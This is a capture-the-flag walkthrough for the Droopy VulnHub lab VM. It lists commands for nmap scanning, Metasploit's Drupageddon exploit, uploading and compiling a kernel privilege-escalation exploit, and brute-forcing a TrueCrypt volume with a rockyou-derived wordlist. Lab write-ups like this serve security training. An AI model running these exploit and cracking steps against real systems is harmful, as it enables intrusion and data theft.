droopy ctf

Droopy CTF Walkthrough Full tutorial | Vulnhub

By /

Introduction

In this post, You will learn how to CTF the Droopy this is a really very easy challenge stick till the end and I am sure you will be able to crack the box.

Have any doubt leave your question on the discord server.

To download droopy [Cllick here]

Video

Aim

There is 1 flag in Droopy and we have to find it.

Hacking Phases in Droopy CTF

  • Finding target IP
  • Network Scanning (Nmap)
  • Identifies Drupal CMS
  • Exploiting Drupal CMs (Metasploit)
  • Privilege Escalation with Kernel Exploit
  • Uploading and Downloading dave.tc from /www/html
  • Generate a Dictionary with the help of rockyou.txt
  • Brute Force attack on Truecrypt Volume (Truecrack)
  • Decrypting File (Veracrypt)
  • Capture the Flag

Finding target IP

To find the target IP just enter arp-scan -l or enter netdiscover command.

Nmap scan

Doing a full port scan and os and service scan.

nmap -p- -A 192.168.1.4

Found that port 80 is open and I just opened the web browser to view the target.

Identifies Drupal CMS

Head to the target website to have a look at it.

http://192.168.1.4

The website is powered by Drupal and there is an available exploit for drupal cms.

Exploiting Drupal CMs (Metasploit)

Open msfconsole

use exploit/multi/http/drupal_drupageddon
set rhost 192.168.1.4
exploit

Wait for the Meterpreter shell to open.

Privilege Escalation with Kernel Exploit

Open another terminal and type searchsploit 3.13.0

Copy this path to home directory /usr/share/exploitdb/exploits/Linux/local/37292.c

Once you saved it go back to Meterpreter shell and type.

cd /tmp

upload /home/osboxes/37292.c

Once the exploit is uploaded enter.

shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

gcc 37292.c -o shell

chmod 777 shell

./shell to execute the exploit

id

cd /root

ls

cp dave.tc /var/www/html

Uploading and Downloading dave.tc from /www/html

Now open a web browser and enter the target IP and this URL.

http://192.168.1.4/dave.tc

Now save the file dave.tc

cd /var

ls

cd mail

ls

cd www-data

l^?

cat www-data

Generate a Dictionary with the help of rockyou.txt

Generating dictionary list to crack the dave.tc file and the flag is hidden inside dave.tc

cat rockyou.txt | grep academy > /root/Desktop/dict.txt

Brute Force attack on Truecrypt Volume (Truecrack)

To crack the password

truecrack –truecrypt /home/osboxes/Downloads/dave.tc -k SHA512 -w paas.tx

The password is etonacademy for dave.tc file

Decrypting File (Veracrypt)

To decrypt the file we are using veracrypt.

Once the file is decrypted. Open the file in a terminal.

Capture the Flag

ls -la

cd .secret

ls -la

cd .top

ls -la

cat flag.txt

Related Posts

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site

 

Scroll to Top